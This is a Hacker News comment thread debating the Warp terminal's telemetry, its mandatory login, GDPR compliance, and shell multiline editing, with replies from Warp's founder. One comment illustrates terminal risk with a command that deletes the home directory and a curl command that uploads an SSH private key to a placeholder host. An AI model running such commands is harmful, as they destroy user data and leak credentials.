Look at the recent logging fiasco for an example.


> If it can send to remote hosts, this can be abused.

A useful terminal cannot be prevented from contacting remote hosts.


You may be conflating programs running in a terminal and the terminal itself. We've managed to get this far without the latter.


I am not conflating the two. If the terminal can run programs connected to the internet, then the terminal has internet connectivity. The host system would not be able to tell the difference.

Warp could certainly promise not to include any phone-home functionality in their code, but unless it's open-source and everything is audited, it could easily call the host system's HTTP client and still phone home.


> If the terminal can run programs connected to the internet, then the terminal has internet connectivity.

Is this true? This sounds wrong to me but I don't know the inner workings of terminals. The terminal just executes programs and handles pipes it seems. A terminal can be completely walled from the internet, and when you execute something from it, say, curl, then curl has it's own memory space and access layer outside the terminal, and just has it's stdio wired to the terminal.


> The terminal just executes programs and handles pipes it seems. A terminal can be completely walled from the internet, and when you execute something from it, say, curl, then curl has it's own memory space and access layer outside the terminal, and just has it's stdio wired to the terminal.

As I said in my comment, even if you "wall" the terminal off from the internet, if it can make system calls on behalf of the user, it can still access the internet.

If a terminal has sufficient access to the host system to call `curl https://www.google.com` on behalf of the user, then it can call it without any user input.

There is nothing on the host machine that can authenticate system calls coming from the terminal application as "user-initiated" or not. This is similar to the warning that "you can't trust the client"[1].

1. https://security.stackexchange.com/questions/105389/dont-tru...


You're technically correct here due to some sloppy words, but this isn't the point that everyone here is trying to make. We know our terminals can connect to the internet, we don't want them to do that without being instructed to. If our terminals randomly curl'd websites (as opposed to delivering telemetry to a 3rd party), I'm sure the discussion would be similarly displeased.


And what I'm saying is that there's no way to set a terminal's permissions on the host system such that it can access the internet on behalf of the user but cannot access the internet on behalf of its creators.

This is a human problem, not a software one. Your terminal is as trustworthy as its creators. It cannot be locked down to prevent telemetry and still be a useful terminal. That was my original point and it is still true.

No one should use a for-profit terminal emulator, especially one created by a VC-backed startup, full stop.


or

they actually listen to our feedback, remove forced telemetry, remove sign-in in the next release, then i'd be more happy to give their product another chance

although no guarantee they'll not turn evil at some point in the future...


Profit motive means that even if they do that now, they're incentivized to collect data in the future. From the standpoint of investors, leaving that revenue stream on the table would be dumb, considering every other company in tech spaces draws revenue from collecting their customers' data.

If a company is committed to never spying, then they'd have no problem making such terms contractually binding on their end. Companies that say they're against spying, but leave the option to collect their users' data open for the future, aren't really committed to not spying.


If they start out evil, then don't expect them to change.


Wanting to collect usage information and errors isn't evil-by-default. It's incomparably useful for troubleshooting and improving. Absolutely nothing works better, it's the best by a ridiculously large margin.

But yeah, terminals are very sensitive environments, opt-in should be a default even at launch.


> Absolutely nothing works better, it's the best by a ridiculously large margin.

Is this really the case? It seems that to find mistakes in software for various interaction patterns, truly exhaustive automated tests would likely work far better by various measures (coverage, reliability, reproducibility, reusability etc.) and at the same time do not have the extreme downside of privacy invasion. For example, see a section from the Age of Empires Post Mortem https://www.gamedeveloper.com/pc/the-game-developer-archives... :

"8. We didn’t take enough advantage of automated testing. In the final weeks of development, we set up the game to automatically play up to eight computers against each other. Additionally, a second computer containing the development platform and debugger could monitor each computer that took part. These games, while randomly generated, were logged so that if anything happened, we could reproduce the exact game over and over until we isolated the problem. The games themselves were allowed to run at an accelerated speed and were left running overnight. This was a great success and helped us in isolating very hard to reproduce problems. Our failure was in not doing this earlier in development; it could have saved us a great deal of time and effort. All of our future production plans now include automated testing from Day One."


Automated tests are completely useless for finding (let alone solving) human interaction issues. To compare them with telemetry is a category error.


Shouldn't human interaction errors be left up to the user to report, as opposed to software sending sensitive information to a third-party?


No data on this but instinctively it seems, given alternatives, most people abandon some buggy software rather than patiently reporting problems and waiting for it to get better.


Yeah. User reporting has a very obvious and very strong survivorship bias. Plus the people who take the time to send in a report are a rather small niche, so you have pretty strong bias even if you exclude people who leave.

Always-on metrics are massively higher quality data. They don't collect the same kind of data in many cases, but they can reveal a lot of things that never get reported. They also don't suffer from the well-established pattern of people not accurately reporting their own behavior when asked / polled (stronger when asking about future behavior, but it applies in all cases).


In production, agreed. In beta, I’ll accept it. I feel that the term beta gets abused a lot, but in what I believe is it’s proper meaning, there are a lot of inherent factors both parties are agreeing to; increased risk of error and data loss, and debugging flags that generate more data for the singular purpose of improving the product. That’s exactly what should be in the privacy policy and explicitly stated upon install. Anything short of that puts me firmly in the hell-no category with you.


With you here on this. Telemetry is a really important concern and I get why people don't like it, but fundamentally the expectations on a beta product surely have to be different in that. The thing is still in development. T


I'm with you on not sending data, but have you ever read user reports? IF you get any (most won't report) they likely won't have enough information to reproduce or fix.

Automated Error reporting does has it uses.


It is evil by default. Paying beta testers, or giving them a free, opt-in version with telemetry is the ethical route. Being ridiculously, over the top clear about exactly what you snarf off the end user is the ethical route.

You are not entitled to access my machine, and that shouldn't be casually dismissed with "don't worry, we're not doing anything bad." You're creating potential vulnerabilities, and by implementing identifiable patterns, reducing the security of your users.

You shouldn't spy on people, and when you do, it's wrong. Remotely inspecting people's behavior is spying.

Your software doesn't need to phone home. It doesn't need automatic updates. You don't need to spy on people to develop good software. That's toxic nonsense.


Ethical telemetry really in my view should:

- be opt-in

- provide an easy to read & access log which can be reviewed by the user at any point

- never collect unnecessary information 'just because' it might be useful in the future

- should provide a very good detailed analysis of any claims to anonymity

If something doesn't even fulfil the first criterion, it's probably violating all the others too.


Telemetry is just the cheapest and most convenient option for business owners, and not necessarily the best option when it comes to improving customer value and experiences.

Case studies, focus groups, surveys and interviews are great ways to determine usage patterns and problems with products and services. Of course, you'd need to pay users to participate in them, and then you need to pay expensive employees to conduct, collect and analyze the results. Spying is cheaper than doing any of that.


I appreciate the balanced, reasonable discussion.

I agree both that telemetry is useful and that there's not necessarily a place for it in the tool I use to manage my workstation and hundreds of servers. Perhaps I'd opt in to a middle ground, that is collect telemetry locally into a support file I can review, evaluate, and potentially redact before submission.


> Absolutely nothing works better, it's the best by a ridiculously large margin.

Then why is the telemetry-encrusted modern Windows a usability fail, even compared to past versions of Windows which relied on extensive in-house user testing?


Because telemetry is used to maximize profit and not to maximize value for users.


Because power users turn off telemetry where they can which means they only see telemetry from "normal users".

That's my theory anyway.


You can’t turn telemetry off in windows. Your choices are “full telemetry” and “less telemetry”


Having data available doesn't mean using it to do anything useful.

As evidence of this, I offer: the vast majority of all human behavior over literally all time.


Usually the practice in these scenarios is to try out all possible ways to make out money and then go a little backwards once the public outcry is big enough. At some point you find the most profitable balance situation, before you have expelled all customers.


There is a plethora of free GPU-accelerated terminals. Alacritty, kitty, foot, wezterm, etc. None of these as far as I know send telemetry data. I see no reason to think that a new terminal is going to make money somehow by finding a balance.


My comparison was about business models of these "evil" cases in general, not about terminals particularly. On general, free apps tends to need find a balance how much users can tolerate their "exploitation" and how much they get from the app, if the app maker wants to make some money.

I don't personally see any reason to swap terminal with telemetry. One of my worst fears that some day I am forced to.


> remove forced telemetry, remove sign-in in the next release

Then why would anybody bother to invest in their next series?


because they have a growing number of paying customers.


They have a complete telemetry section on their website where it also states that no input or output data is collected.


the problem with telemetry data is that sometimes you can accidentally collect sensitive data without realising it. i know one library on iOS was collecting the coordinates of all touch events. however, that meant it was collecting the coordinates of all touches on the keyboard which made it possible to reconstruct user input into password fields.


You’re right about there being a problem with it.

Which library was/is doing this? Would like to avoid it.


Which is worth nothing if it can't be examined and verified (not to mention it can change with any release).


As the author of the post (and founder of the company), I think this is also a very reasonable concern. It's one that we have as well and that we take very seriously.

Our stance here is that:

1) We are very explicit about what gets sent (only telemetry and crash reporting) and you can see the full list of telemetry events here (https://docs.warp.dev/getting-started/privacy#exhaustive-tel...)

2) For collaborative features like block-sharing (e.g. https://app.warp.dev/block/tbxmeAKsj657aHkPdHpmoY) it's completely opt-in

However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception. I stand by that but get that it's a paradigm shift.

Please keep the feedback coming though - it's helpful to understand how you think about it.


> However, I do believe pretty deeply that every app has the potential to be much more powerful if it leverages the internet and I think the terminal is not an exception.

But that’s exactly it. A lot of people on here, including me, do not agree that _every_ app has that potential. In fact many believe that internet connected apps are unnecessary for many things. There is strong evidence against this if you just look at the number of “secure” systems that have been hacked over the decades. While you may capture a large audience with your internet-first terminal “app”, who honestly don’t care about this stuff while at work, you will get pushback from HN and somewhat+ privacy concerned devs.


Then maybe Warp is not the right terminal for you? It is ok if other people like Warp for what it is.

Here's another rust based terminal you can check out: https://github.com/alacritty/alacritty


As a user, I can see the potential, sure. But it's not realized in any way. Right now this terminal uses Internet only for collecting my data (GitHub account, telemetry, and more).

The value proposition is negative. A paradigm shift, sure, but IMO in wrong direction.


This was my first concern as well. I don't want my terminal to be a startup.


> I expect my terminal to be a much more secure environment than my web browser.

Wat? Your terminal is 1000x less secure than your browser. Your terminal can do `rm -rf ~/`. your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com` and that just 2 of 1000s.

JS on your browser can do none of those.

Maybe you meant to say you want apps running from the terminal to not phone home but nothing in the terminal prevents that.


That's security vs. safety. You're pointing out that a terminal allows the user to do perform actions that could be unsafe. These actions or JS in the browser are a security risk because they can perform actions without the user's awareness or consent.


nonsense. The terminal is a place that you run software. Every piece of software you run in the terminal can do all kinds of nasty things to your system and steal info

the browser is also a place to run software. There, that software can not do anything to your system nor can it steal any data


> Your terminal can do `rm -rf ~/`. your terminal can run `curl -F 'data=@~/.ssh/id.rsa' https://bad.com` and that just 2 of 1000s.

You'll be warned if you do the first, and plenty of people are phished via browsers.


>You'll be warned if you do the first.

I don't think so. I dare you to run it.


I'm not sure I'm ready to have SaaS models replace core utilities and tools locally.

> Announcing Warp’s Series A: $17M to build a better terminal

And just thinking about this... it's not clear to me what their moat will be as I suspect if there's a really compelling feature it will be available in OSS terminals quite quickly. Perhaps it's the product polish? But I'm not sure polish is what I want from a terminal, at least... it's not the top thing I want .


I wondered the same. Then I realized it sends out requests to googleapis, segment, and sentry. Imagine having data on every dev's terminal workflow? Ca$h.


Sounds more like a good way to get your product banned from a lot of workplaces.


A lot of workplaces don't even bother to ban grammarly, which is literally a keylogger*, this won't even be on their radar.

* I feel compelled to point out that Grammarly disagree with this definition because it doesn't send every single keystroke, just the ones in non-password text boxes.


Is grammarly not correct here?


If my plugin Passwordly, only sends the keystrokes inside password boxes, is or isn't that a key logger? It's only capturing a subset of your input, like Grammarly, so not a keylogger?

If the argument is, it's not a keylogger because it's not logging sensitive information, well I type plenty of sensitive information into non-password textboxes.


I’d say passwordly also isn’t a key logger. By your definition every text editor would be a key logger. That may be the strict definition of a key logger but the commonly accepted meaning is different. A keylogger logs all keys regardless of the app being used or general use case. Often they are malicious as well but that doesn’t have to be the case.


I doubt their compelling features will be in OSS terminals any time soon. I’ve wanted a terminal that has a decent multi line editor for years, and there’s nothing out there.


Vim supports multiline editing and I'd imagine emacs does as well. In bash/zsh, <ctrl-x ctrl-e> opens up $EDITOR so you can use whatever you're accustomed to anyhow.

Most of these features are already available if one spends a bit of time configuring their terminal/shell.


Is multiline editing popular/useful? Thus far, the only occasions I've seen it shown is when someone is demonstrating it.


I use the visual-multi plugin [0] all day in vim/neovim.

I don't like using tons of plugins but multi cursor with with selective invocation like the ctrl-d of sublime etc was the main thing I missed when moving to vim. (I use visual block mode too but it's not the same thing).

https://github.com/mg979/vim-visual-multi.git


I'd say so, I find myself using it somewhat regularly.

It's pretty easy in vim once you learn how to use visual block mode. That or using Sed to replace text in a selection or the entire file.

http://paulrougieux.github.io/vim.html#Edit_multiple_lines


They are very useful! As a long time Vim user who switched to Kakoune[0] a while back, I didn't even realize I needed a good multiline cursor from my editor before it tried Kakoune. Highly recommend it!

[0] https://kakoune.org/


If you need to pass lots of arguments to a command it's super useful. Typically I don't do this because it's quite unwieldly with a standard readline editor, but I could if multiline editing was available!


Put `set -o vi` in your .bashrc

That's all you need - you don't need a whole program that collects all of your information.


I use it not infrequently for crafting big ol bash pipelines to put into scripts, specifically via emacs’ `shell` terminal emulator.


Thank you for sharing this tip ^_^


While this can be done in zsh/bash, it takes investment to understand how to use multiline specifically. And then once you leave the terminal, the same keystroke does not do anything for you.

One of Warp is that you don't have to think twice about it because it behaves similarly to text fields everywhere else on your computer.

In the terminal, I often have the feeling that personal computing revolution from Xerox PARC & Apple Computer never happened.


This works in everything that uses libreadline to accept user input (unless the binary has specifically configured library differently iiuc), so should work in all shell-like interfaces. You can customize the shortcuts in inputrc, likewise, for all libreadline-using binaries. By default, readline tries to be emacs-like. You can ask it to be vi-like, or reconfigure lots of its shortcuts to be similar to an editor you like. To be fair, "escape to real editor" is not a thing you usually do in an editor, so that will remain special.


This stuff has been in the major shells for years, through excellent editor integration. For emacs and vi it's pretty much free. If you want to integrate with a different editor, it's totally doable.

Most of the stuff sibling comment is referring to center around the feature:

'edit-and-execute-command' in bash. There is a similar incantation for zsh.

I summon it with, 'ESC v' in both.


If I open an editor then my scrollback history isn't visible (or is in a separate window). Maybe vim and emacs offer this, but that's a big commitment just for a terminal. Warp has GUI-grade editing (mouse support, etc) with things like multiple cursors in a very nice interface.


Ctrl-z will put Vim to sleep. You can look at the history and then type `fg` to bring the Vim back to the foreground.


In emacs a shell is like a text buffer where you can simply search or move around as you would do in a text file. To get command history you'd just execute `history` and then ctrl+s (find) it, or move to it with the cursor.


So does Emacs. I kind of assume vim and neovim do too, these days.


Normally I would pull the command I need multi-line editing for back from shell history, using the search operator '!' and print predicate ':p' before invoking bash's 'edit-and-execute-command' on it. I suppose while in the editor then I might need history again, but I can't recall it being an issue.


Three words for 2 tests regarding these features:

1. discoverability

2. wide spread use.

Bash and zsh fail both tests.


I love how my previous comment is downvoted with no answer by I assume bash and zsh fanboys when these kinds of features are barely used by users, because they can't be easily found.

Use something like fish to see what real feature discoverability for a shell looks like.

And I say this as a zsh user that has waded through the mountains of obscure documentation to set it up. Don't fall into Stockholm syndrome and think that if you went through hardship, others should, too.

99% of bash/zsh discussion threads are someone going: "here is awesome feature I found" (where frequently that feature is something that should have been painfully obvious to notice) and then 100 replies: "that's so cool and useful, I never knew about it and I've been using bash/zsh for N > 5 years".


I have no idea who downvoted you or why they did so. I'm seeing your reply for the first time. From what I can see, our priorities in our tools are different. Discoverability and widespread use of particular features are not near the top of my list. I have read the bash manual. For the tools I use most, I've found it to be a good investment, that has paid me great dividends.


> a terminal that has a decent multi line editor for years

You can use ctrl-x ctrl-e in most terminals.

https://unix.stackexchange.com/questions/85391/where-is-the-...


>You can use ctrl-x ctrl-e in most terminals.

Shells, not terminals.


In Bash:

    C-x C-e
This opens $EDITOR, and when you finish editing and close it, it runs the code.


haha well "decent" is in the eye of the beholder, I'd argue that vim is not only "decent" but by far the best general purpose IDE available.


> I’ve wanted a terminal that has a decent multi line editor for years, and there’s nothing out there.

You can go the other direction.

Install neovim. Run `:terminal`. optionally run `:help Terminal-mode` first so you can figure out how to get out.


Doesn't `set -o vi` do this for you? Place it in .bashrc and you're good to go.

It's great to use this with awesomewm for windows management, and vimium for browser control. Then you can develop in vim, bash in vim, browse in vim, and switch windows with vim. You don't have to learn 10 different, unintuitive, and ridiculous hotkeys for each different program or level.


I use pretty out of the box zsh with vi-mode and it... just works for multiline editing? I can simply move down and up with j/k...


It depends how you define multiline but check out: https://github.com/jart/bestline


Multiline works out of box in fish shell. I'm not sure how terminal is relevant here.


Terminals are largely owned by graybeard maintainers that aren’t interested in innovating the Unix command line. This is not a difficult change.


> I'm not sure I'm ready to have SaaS models replace core utilities and tools locally.

This isn't something you can ever be ready for. It's so completely and obviously wrong. Just say no.


The moat would be if teams depend on it for sharing workflows. Doing "teams" right on OSS is tricky, much easier to pull off in SaaS.


Warp engineer here.

FWIW, the Warp terminal will be free for individuals. We would never charge for anything a terminal currently does. So no paywalls around SSH or anything like that. The types of features we could eventually charge for are team features.

Our bet is that the moat is going to be the team features, like:

- Sharing hard-to-remember workflows

- Wikis and READMEs that run directly in the terminal

- Session sharing for joint debugging

Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.


> The types of features we could eventually charge for are team features.

You can probably maximize community acceptance if you provide clients that do not use these features as actual FOSS and only start incorporating closed-source pieces for those features. With things like client keys etc to restrict server access.

A bit like the Chrome/Chromium thing was intended initially.


> - Sharing hard-to-remember workflows

Those get codified into ansible and deployed on CI/CD pipelines. This is an anti-feature. The day that someone suggests using a terminal to manage hard-to-remember workflows is the day I start a huge crusade to fix whatever process led to introducing yet another tool.


> - Sharing hard-to-remember workflows = Make better scripts and put in CI

> - Wikis and READMEs that run directly in the terminal No thank you

> - Session sharing for joint debugging = That's more for development.. not for shell access

> Our bet is their companies are willing to pay for these. BTW, even these team features will likely be free up to some level of usage and only charged in a company context.

I actually don't want them. I migrated from many apps that do too much to apps that do one thing really well.


What would be the advantage over version controlled shell scripts?


(Not affiliated with Warp but care about this particular thing)

Shell scripts implies, well, a particular shell. If everyone is on similar OSes, maybe that works for you, but as a Windows user, "pile of bash scripts" might as well be "doesn't work for you." I use a terminal for my daily work, but don't have bash installed on my machine.

That said, I haven't tried Warp yet specifically because it's Mac-only right now. Even within that context, Warp integrates with Bash, Zsh, or Fish, which do have their own extensions to POSIX shell, but at least you can rely on Bash being installed.


That would also now force everyone to use this proprietary product instead of whatever they're familiar with.

For mac <-> linux, posix-compliant scripts mostly work in my experience but you have to account for different versions of gnu utils. For linux <-> windows, if it's small you could just write a powershell script, or use something like python on both, no?

I fail to see how these features are nice enough to force people to use a proprietary terminal that, for now, is compatible with existing bash/zsh shells.


Yes, that is true, but it does seem like that's what their strategy is. If you're using these collaboration tools at your job, you'd have to be using the product already. So that's less of a problem than it would be for say, scripts included with some sort of open source project.

My point is mostly that shell isn't cross-platform, and this is one way you could address that. But it's not a generalized solution, absolutely.

(and yeah, something like Python is better than trying to keep multiple of the same scripts in different languages, for sure. You can do it if you wanted though, if they're small and you're willing to commit to it, I'm not sure I've ever seen it really pulled off.)


>shell isn't cross-platform

basically every operating system has a posix shell by default except windows, but it has been ported there multiple times, samba existed for decades and WSL is on the rise. It may sound a little more irritating but they deserve it for still running windows :p /hj (besides you can just host an ssh server)


I mean, I could also tell you "Just download and run PowerShell, it's ported to Linux", but you also know that would make you feel like a second-class citizen, because you know it's not something as good as something that actually works on your platform in a real sense.


Nix(OS) already solves this problem.


I cannot use Nix on my platform, and I’m not changing OSes.


Which platform do you use?


Why would it be easier to port Warp to a new system compared to Bash, Python, Perl, etc.? These tools are widely used to automate workflows and are already ported to any system you would probably care to develop on.


You aren't the one porting Warp, but you are the one porting the shell script.


So programs/workflows written in Warp will be portable without much effort, in some way that an equivalent shell or python script isn't? Why do you think that?


It seems like you’re grouping a bunch of things together and saying I have opinions about them that I don’t. Let’s break them out:

workflows I would assume to be portable, yes. It is an assumption. I generally expect program configuration to be mostly cross platform by default.

I’m not sure what a program written for a particular terminal would be, so I’m not sure if I’d assume portability or not.

Shells are not ubiquitous, even if they are available across platforms technically.

Python is truly cross platform and largely ubiquitous.


Ok, maybe I misunderstand what a "workflow" is. Since we are talking about replacing shell scripts with "workflows", I assumed that they are a kind of programming facility of about similar power as shell scripts. But that may be incorrect.

> You aren't the one porting Warp, but you are the one porting the shell script.

It sounds like your are saying somthing like "Warp scripts/workflows require almost no effort to port, compared to the shell scripts they replace". I was interested to learn how this can be the case. Perhaps my interpretation was wrong.


I may also be too; like I said, I haven't used Warp yet. Just read their docs. "Workflows" are described in their docs as effectively 'aliases with better docs that integrate with a search bar', and are defined in a YAML file. They don't actually show said YAML file, so I don't know how complex they are. If they give you the full power of the underlying shell, then yeah, you're back at the exact same problem, but if it's stuff like "invoke this program with this set of arguments," which is what their examples seem like, then I'd expect it to work with any shell as long as that program is installed.

> Perhaps my interpretation was wrong.

And perhaps mine is. The docs aren't in-depth and I don't own a Mac. But really, ultimately, "are workflows more portable" isn't a question I personally am wed to; it's that "shell scripts are only portable via UNIXes and there's a much bigger world out there" that I am, and I am hoping that workflows are more portable than shell scripts. In practice, they may be, or they may not be, but since they're in a layer above the shell, it's possible that they're not shell-specific.


Thats a good question. In the end Warp programs/scripts will be written in just yet another interpreted language.


That's a great question! Version controlled shell scripts are very useful (and in fact workflows in Warp can also be version controlled) but they still have a few problems: 1) Documentation--when a repo has a lot of shell scripts, it can be very difficult to know which command to run in certain situations. Even if each shell script has documentation, there's no way to find that documentation natively from the terminal itself. 2) Searching--you can only execute commands from the terminal based on the shell script name but there's no easy way to search for a script based on _what_ it does or any other metadata.


> - Wikis and READMEs that run directly in the terminal

Nushell can open READMEs natively and can admittedly work with Wikis through a plugin.


$3.99/mo for the Pro plan let's you run as many concurrent processes as you want!


It's just.. an incredibly bad look to have this be the top comment on a post about this while the website claims that "cloud stuff" is opt-in.

It's more essential to be honest about this during the beta period than after, so "oh it will be opt in" is a cold comfort, alongside the approximately never-true "we'll open source it some day."

Not touching this with a ten foot pole. Not for something as essential to my day to day work as a terminal.


Further down in the thread, they claim that Warp is nearly as fast as Alacritty. Then a user points out that it isn't even close and their response is basically, yeah, we know that. We want to fix it.

How does a company expect lying on HN to work out well for them? I'm sure they're doing their best, and are excited about their launch. But they are coming off as so shady because they're trying to fool people.


If they really wanted to be open source but don't accept contributions at the time, setting up a read only minor with a proper FOSS license will be a good way to do that.


We tried to be really upfront in the privacy policy:

https://www.warp.dev/privacy

Opt-in refers to anything that sends any contents of a terminal session to our servers (as opposed to telemetry which is metadata and never contains any terminal input or output). But we hear the feedback and appreciate it.


At issue here is your front page, which says:

"Private & Secure: All cloud features are opt-in. Data is encrypted at rest."

While you might have some wiggle room to say that telemetry is not a "cloud feature", logging in with github is absolutely a cloud thing and it's not really opt-in if you can't use the software without literally identifying yourself to a cloud service.

You should at the very least remove that text from your front page until you're out of beta and it's actually true.

And that's ignoring the fact that there's no victory in splitting hairs over the definition of cloud stuff to pretend you're not walking a very fine line.


Zach, this telemetry approach is fine for Google Docs retail users but Warp's target customers are some of the tech savviest people on the planet. They are going to hold Warp to much higher standards of security and privacy.

Second, your user onboarding has too much friction with mandatory Github logins. You need an advisor / product manager who can guide you better when making these "human" decisions.


Yikes!

Because you posted directly to HN and clearly want to show this audience the value of your work, I expected a somewhat different reply to this critique.

A more user-centered reply might have been to say you understand the confusion and will look into making this truly opt-in with the team. I think the strong message you're getting from this community—who is, after all, your target audience—is that before sending any data (whether you choose to label it telemetry, tracking, diagnostic data, or otherwise), you should explicitly ask in the terminal itself whether the user finds this acceptable.

I don't want to put down an effort with seemingly good intentions like this one, so please take this engagement in the spirit it was given.


That doesn't fit people's normal expectations. You're being intentionally deceptive.


> Opt-in refers to anything that sends any contents of a terminal session to our servers

There shouldn’t even be the option to opt-in to something so privacy violating.

Having built-in sending of session content means dangerous data exfiltration is always just one bug or accidental click away.


I was confused by your wording, but I think this section of the link is very relevant:

>When Warp comes out of beta, telemetry will be opt-in and anonymous.

>But for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.


I highly doubt anyone reads that. I think the only way to be up-front about it is to have an annoying pop-up that with a button that says "OK YOU CAN SEND TELEMETRY" that must be clicked before proceeding.

To be fair, I think HN is a collection of outliers when it comes to caring about network activity caused by running programs. Most devs will probably just be happy that the tool provides a lot of value.


Wrong crowd for this approach, I think.


If you really wanted to be open source but don't accept contributions at the time, setting up a read only minor with a proper FOSS license will be a good way to do that.


Do you believe your policy is GDPR compliant?


No way this is GDPR compliant. A mandatory Github login sends data to US servers. Even with the normal additional standard contract clauses it is at least disputed, if this holds any grounds in a CJEU trial.

Twilio, the owner of Segment.io is also a US company and will receive individual-related telemetry data, which should break with GDPR.


As the author of the post, I think this is totally reasonable feedback and something we have discussed quite a bit on the team.

The general stance on telemetry that we have is that a) we are just starting and it's really helpful to see which of our product ideas are useful to our users (e.g. does anyone use AI Command Search? Should we continue to invest in it) b) we tried to be very explicit about what we are and are not sending - it is only metadata and never command input or output (you can see the full list of events we track here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel... c) if you aren't comfortable with telemetry, then please don't use the product just yet - we will make telemetry opt-in when we have a large enough sample size that we can be confident extrapolating what's going on

For googleapis - this is for login. We use firebase as our auth provider.

For segment - this is for temeletry, as you point out.

For sentry - this is for crash reporting.

As for why we have accounts, it's because we are starting to add features for teams and it's important in that context that there is some type of identity associated with the user.

But like I said at the start - the feedback is totally reasonable and we are trying to figure out how to balance concerns here while still being in a good place to iterate on and improve the product.


As a Sentry user (for a web app where people are not placing sensitive IP!) - it is INCREDIBLY easy for it to be configured to suck up massive amounts of PII and sensitive IP in the context of its crash reports. If I am running `kubectl create secret --from-literal` and something crashes, can you guarantee that the contents of that command will not be loaded into Sentry? Breaching this guarantee would be as simple as having some code somewhere in your stack (including a parsing library) format an Error with the command contents, miles away from anything Sentry-specific.

I'd be much more trustful of your product (and indeed, I do desperately need a better terminal!) if you were to:

- make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND

- clarify in your event telemetry documentation, and explicitly in your Privacy Policy, that ONLY the event ID/name, timing, and the user ID are sent to Segment, nothing else.

But I simply cannot use a terminal where my keystrokes might be logged to anyone's Sentry or Segment account - even if it were our company's own Sentry account. The risk of partner-entrusted credential leakage into an insecure environment is simply too high.


> - make Sentry crash reporting opt-in (or at the very least have a popup that occurs with the content of what will be sent to Sentry before anything is sent to Sentry), AND

100% this. I don't entirely understand why Warp needs to connect to Sentry right at application launch. If it crashes, capture that crash and present me an opportunity to report it or not. If I do agree to report it, first present me the complete text of everything that will be reported.

I understand that this puts some hurdles in the way of getting crash reports. But terminals frequently contain information far too sensitive to trust with these things being automated.


Is this answer minimizing a bit?

You can use the Firebase login tools without the person identification stuff pulled in. Note that for companies failing to do this in a privacy respecting way, a savvy user can usually get granular at the firewall and get the login to work without the audience reporting. Which means you could…

Similarly, in my book, segment.io isn’t just “telemetry” so much as it’s killer feature of cross app audience persona correlation, so less about what’s up with the app, more trying to learn more about the users without asking them. If you were instrumenting the app UX and not trying to see who is using you, there are other choices.

A number of ways to do accounts that can leverage a person’s own IdP or other approaches where you don’t have to have accounts, e.g. most any channel the team or group can access will do to get in sync on a session start.

Regardless, and even if GitHub and e.g GitHub Orgs are your way, all of them should be optional since not everyone is desperate to team their cli.

Last, and sorry to put it like this, if you’ve “discussed it quite a bit” as a team, I’m not sure but maybe that gives me less confidence in your respect for security, privacy, and users.

I’d imagine that deliberate discussion backed by respect for your users and team know-how should have resulted in a different set of choices.


Is login and authentication really necessary? No internet -> no terminal?

Even VScode a massive Microsoft project does not require signup/authentication to use it...

Love the design, but seems like a very enterprise-driven and niche product for a lot of developers


> Warp is a blazingly fast, rust-based terminal reimagined from the ground up to work like a modern app.

Well, at least they didn't lie.

As of my personal position: I want less products in my computing environments, not more. I hope more people would ponder on possible ramifications of going in the opposite direction.


I'm not sure I care very much about which piece of software is a "product" or not (I have no qualms with devs asking for money), but I definitely agree that calling a piece of software "modern" actually carries negative connotations nowadays. I think most would agree that apps developed within the last 4 years are often more resource-intensive and slower than the equivalents from 15+ years ago.

Warp looks really cool as a tool and I intend to try it as soon as it's available on Linux, but it was pretty bold of them to include outgoing network requests by default before presenting directly to HN. I saw the post about "everything is opt in, where 'everything' means 'sending terminal contents'" - as if people read privacy policies before trying out a new dev tool.


We exists, but it's complicated. A complete solution has more edge cases than what "stacks" have tools to work with. My gut feeling is that the contemporary approach to solving information problems is crazy nonsense. I'm working on something to prove myself wrong. If I'm not I'll make something available for a fee


Yeah. From a developer standpoint my terminal is the one sacred thing i have still. Im unfortunately not using something that is going to randomly break or make external calls every time I open it.

Looks cool but I will never even give this a try.


I nearly also used the word “sacred” in my comment above.

I gave up MacOS for Linux because I felt like Apple wasn’t letting me operate my own computer anymore. Even Ubuntu has eroded the transparency and control I have over my computer over the last decade, at least that’s my perception.

I feel like the only part of my computer that I understand anymore is what happens in the terminal.

I don’t categorically hate having magic happen on some remote server that makes computing easier for me in some way… but I really need to have a space that I understand and control and — over time — that place has slowly been compressed into the command line.


> Wanted to give it a shot but got disappointed when I launched it and the following happened

Yup, well, that's what happens when you take money from VCs or other third party investors, you need to monetise / demonstrate ROI / need numbers for your investor slide-decks.

I'll stick to my old-fashioned spyware free terminal thanks very much. Why overcomplicate things that don't need to be complicated.


Yep. In my last project one of the key USPs was privacy. The product vision was built around it and it was fundamental to our positioning in the market.

But I made the mistake of letting investors share executive control of the company, and pop there goes the pro-privacy policy.

In defence of founders everywhere, however, I will say that the investors didn’t just say “no”. They strung me along for almost a year, insisting we would be meeting about it, recording decisions where we apparently agreed, even pointing out those decisions while they flagrantly violated them in practice.

So who knows what’s happened here. A lot of the messaging sounds like what happened to me. “Yes we know privacy is important and in the future mumble mumble.”


Yea, I would never use a terminal that does any of that. If you want logging and crash reports, use Breakpad or something similar to send the crash report after a crash. No need to have telemetry reports going all the time.


In addition to crashes, we also want to know things like: which features people are using so we can invest more in them, how much people are using the app so we know if we're doing in a good job.

Totally understand if you're not comfortable with that though! It will be removed when Warp is out of the beta test.


I know it sounds logical to you, but the further down that road you go the worse your software will be in the end. Make software with a coherent vision and you can pick and choose features based on how will they fit that vision without needing to spy on your users, or turn it into a popularity contest.

Incidentally, you might be interested to know that in the last 8 hours my comment has gotten 25 upvotes; that’s a lot of lost customers.


> Incidentally, you might be interested to know that in the last 8 hours my comment has gotten 25 upvotes; that’s a lot of lost customers.

No, that's a lot of people who upvoted your comment.

I'd wager anyone who agrees with your perspective is unlikely to have been a Warp customer in the first place.

(Speaking as one who tends towards your side of this discussion.)


I don’t mean that my comment cost them customers, only that the upvotes on my comment measures the customers they had already lost by using pervasive telemetry.


I doubt that even a plurality of the people who upvoted you would have installed Warp and wound up paying for it.


I hate telemetry driven development.

It just results in loosing infrequently used but important features. First it gets moved from a button to a menu, then to a sub-menu and eventually removed.


